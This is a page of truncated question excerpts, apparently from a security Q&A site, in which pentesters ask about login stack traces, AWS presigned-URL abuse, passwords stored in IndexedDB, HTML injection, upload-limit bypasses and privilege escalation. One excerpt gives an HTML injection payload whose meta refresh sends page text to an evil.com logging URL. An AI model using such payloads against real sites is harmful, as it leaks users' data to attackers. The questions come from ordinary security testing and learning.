Collaborate Disseminate
When logging in to the application, on providing incorrect creds the application shows j_spring_security_check – Stack Trace Error.
Is it a security vulnerability or not? as it helps an attacker to get an idea of the backend stack and narr… Continue reading j_spring_security_check – Stack trace Error [closed]
Can anyone share the content to learn how to abuse/exploit the presigned url policies and bucket file upload post policies.
however i read below mentioned blog: https://labs.detectify.com/writeups/bypassing-and-exploiting-bucket-upload-pol… Continue reading How to exploit pre-signed URLs on AWS [closed]
During my penetration testing on the target, I noticed that passwords were being saved in the IndexedDB file even when i did not saved in the browser.
To verify this, I logged out, closed the browser, and upon reopening the IndexedDB file,… Continue reading Insecure Local Storage [closed]
Application login request is shown below.
The postgres information is passed via the cabinetName parameter. Is it a vulnerability? is it useful? can we exploit it?
or any other ways to exploit below request?
POST /<REDACTED>/LoginSer… Continue reading postgres database information passing in request can we exploit further? [closed]
I found an HTML injection vulnerability and I entered some random HTMLi payload to see what can I do further. For that, I give this payload:
<meta http-equiv="refresh" content=’0; url=http://evil.com/log.php?text=
After giving… Continue reading Server throws Null Pointer Exception error when trying html injection [closed]
On one of the targets, I have a feature to upload files where I can upload files, but every account gets 100mb capacity.
How can I bypass the size limit to upload files more than 100 MB?
I tried race conditions.
Suppose I have an Admin account and a normal user account. There is some functionality that is only accessible to the admin only, like promoting other users. In this scenario, I captured a request from the admin when the admin is promoting… Continue reading Is this considered Privilege Escalation?